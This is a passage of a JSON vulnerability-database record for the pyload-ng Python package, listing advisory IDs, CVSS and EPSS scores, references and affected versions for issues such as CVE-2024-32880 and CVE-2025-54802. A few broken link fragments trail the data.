"VCID-6ujx-ntw5-s7dy" }, { "vulnerability": "VCID-73d4-um61-k7ht" }, { "vulnerability": "VCID-9rb6-kh78-sbdf" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-a7fd-nsys-qub1" }, { "vulnerability": "VCID-bzxw-4smh-6yed" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-f95r-tk7k-gufe" }, { "vulnerability": "VCID-f9wx-gf1u-7bgc" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hkus-pqz4-uyb2" }, { "vulnerability": "VCID-hsc6-6qgc-q3eg" }, { "vulnerability": "VCID-hva8-kb62-rkax" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-mbkb-u95k-yfgc" }, { "vulnerability": "VCID-ng6u-saxg-dbf9" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" }, { "vulnerability": "VCID-u712-62py-aqgt" }, { "vulnerability": "VCID-ut9v-xcjn-ukb1" }, { "vulnerability": "VCID-vzzm-8en6-fydc" }, { "vulnerability": "VCID-x15r-v69w-yuaj" }, { "vulnerability": "VCID-x1ek-3cgq-skh9" }, { "vulnerability": "VCID-xgcy-vqcp-43dj" }, { "vulnerability": "VCID-xs39-z9t4-wyh9" }, { "vulnerability": "VCID-yk3e-d92p-cubu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev78" } ], "aliases": [ "GHSA-2wcm-vx67-3x4q" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xhbh-mwv5-wfgf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/47548?format=api", "vulnerability_id": "VCID-xs39-z9t4-wyh9", "summary": "pyLoad allows upload to arbitrary folder lead to RCE\nAn authenticated user can change the download folder and upload a crafted template to the specified folder lead to remote code execution", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-32880", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.04609", "scoring_system": "epss", "scoring_elements": "0.89459", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-32880" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32880", "reference_id": "CVE-2024-32880", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32880" }, { "reference_url": "https://github.com/advisories/GHSA-3f7w-p8vr-4v5f", "reference_id": "GHSA-3f7w-p8vr-4v5f", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3f7w-p8vr-4v5f" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-3f7w-p8vr-4v5f", "reference_id": "GHSA-3f7w-p8vr-4v5f", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-04-26T18:47:38Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-3f7w-p8vr-4v5f" } ], "fixed_packages": [], "aliases": [ "CVE-2024-32880", "GHSA-3f7w-p8vr-4v5f" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xs39-z9t4-wyh9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/57773?format=api", "vulnerability_id": "VCID-yk3e-d92p-cubu", "summary": "Duplicate\nThis advisory duplicates another.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-54802", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.02893", "scoring_system": "epss", "scoring_elements": "0.8661", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-54802" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/70a44fe02c03bce92337b5d370d2a45caa4de3d4", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-05T14:29:40Z/" } ], "url": "https://github.com/pyload/pyload/commit/70a44fe02c03bce92337b5d370d2a45caa4de3d4" }, { "reference_url": "https://github.com/pyload/pyload/pull/4596", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-05T14:29:40Z/" } ], "url": "https://github.com/pyload/pyload/pull/4596" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54802", "reference_id": "CVE-2025-54802", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54802" }, { "reference_url": "https://github.com/advisories/GHSA-48rp-jc79-2264", "reference_id": "GHSA-48rp-jc79-2264", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-48rp-jc79-2264" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-48rp-jc79-2264", "reference_id": "GHSA-48rp-jc79-2264", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-05T14:29:40Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-48rp-jc79-2264" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48574?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev90", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-4fna-mzsg-w7d5" }, { "vulnerability": "VCID-6ujx-ntw5-s7dy" }, { "vulnerability": "VCID-73d4-um61-k7ht" }, { "vulnerability": "VCID-9rb6-kh78-sbdf" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-f95r-tk7k-gufe" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hkus-pqz4-uyb2" }, { "vulnerability": "VCID-hsc6-6qgc-q3eg" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-mbkb-u95k-yfgc" }, { "vulnerability": "VCID-ng6u-saxg-dbf9" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" }, { "vulnerability": "VCID-ut9v-xcjn-ukb1" }, { "vulnerability": "VCID-vzzm-8en6-fydc" }, { "vulnerability": "VCID-x15r-v69w-yuaj" }, { "vulnerability": "VCID-x1ek-3cgq-skh9" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev90" } ], "aliases": [ "CVE-2025-54802", "GHSA-48rp-jc79-2264" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-yk3e-d92p-cubu" } ], "fixing_vulnerabilities": [], "risk_score": "4.5", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0a5.dev532" }
\n\nWe](http://below.%5Cn%5Cn%5CnWe){kind=link}
\n\nLet](http://user.%5Cn%5Cn%5CnLet){kind=link}
\n\nThe](http://permissions.%5Cn%5Cn%5CnThe){kind=link}
\n\n###](http://application.%5Cn%5Cn%5Cn###){kind=link}